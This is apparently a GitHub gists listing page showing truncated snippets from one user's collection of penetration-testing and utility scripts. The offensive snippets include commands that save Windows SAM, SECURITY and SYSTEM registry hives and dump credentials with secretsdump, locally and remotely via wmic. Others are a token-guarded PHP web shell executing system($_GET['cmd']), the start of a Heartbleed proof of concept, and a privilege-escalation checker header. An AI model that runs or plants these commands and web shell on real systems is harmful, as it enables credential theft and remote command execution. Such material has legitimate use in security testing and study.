This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/env python | |
############################################################################################################### | |
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script | |
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift | |
##------------------------------------------------------------------------------------------------------------- | |
## [Details]: | |
## This script is intended to be executed locally on a Linux box to enumerate basic system info and | |
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text | |
## passwords and applicable exploits. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
reg.exe save hklm\sam c:\temp\sam.save | |
reg.exe save hklm\security c:\temp\security.save | |
reg.exe save hklm\system c:\temp\system.save | |
secretsdump.py -sam sam.save -security security.save -system system.save LOCAL | |
#https://github.com/CoreSecurity/impacket/blob/master/examples/secretsdump.py | |
#Do this remotely | |
wmic /node:"<computer_name>" /user:"<username>" /password:"<password>" process call create "cmd.exe /c reg save hklm\sam C:\temp\sam.save" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) | |
# The author disclaims copyright to this source code. | |
import sys | |
import struct | |
import socket | |
import time | |
import select |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# You don't need Fog in Ruby or some other library to upload to S3 -- shell works perfectly fine | |
# This is how I upload my new Sol Trader builds (http://soltrader.net) | |
# Based on a modified script from here: http://tmont.com/blargh/2014/1/uploading-to-s3-in-bash | |
# ==================================================================================== | |
# Aug 25, 2016 sh1n0b1 | |
# Modified this script to support AWS session token | |
# More work will be done on this. | |
# | |
# S3KEY="ASIAJLFN####################" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
#=============================================================================================== | |
# System Required: Debian 9 | |
# Description: Shadowsocks Server deployment script for Debian 9 | |
# Author: https://github.com/sh1n0b1 | |
#=============================================================================================== | |
apt update | |
apt install -y curl sudo | |
sudo apt install -y shadowsocks-libev | |
sudo systemctl start shadowsocks-libev |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
alias urldecode='python -c "import sys, urllib as ul; print ul.unquote_plus(sys.argv[1])"' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
//$allowedToken = "509F7BA70C680DDAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; | |
$allowedToken = "<REPLACE_WITH_SOME_RANDOM_LONG_STRING>"; | |
$token = $_GET['token']; | |
if ($token == $allowedToken){ | |
echo system($_GET['cmd']); | |
}else{ | |
header("HTTP/1.0 404 Not Found"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Original source code: https://docs.aws.amazon.com/en_us/IAM/latest/UserGuide/id_roles_providers_enable-console-custom-url.html | |
import urllib, json | |
import requests | |
access_key = '' | |
secret_key = '' | |
session_token = '' | |
json_string_with_temp_credentials = '{' | |
json_string_with_temp_credentials += '"sessionId":"' + access_key + '",' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <string.h> | |
#include "lib.h" | |
#include <Wininet.h> | |
//#include "starter.h" | |
//include OTF | |
#include "font.h" // foofont is fetched from loader config struct | |
//#include "cert.h" |
NewerOlder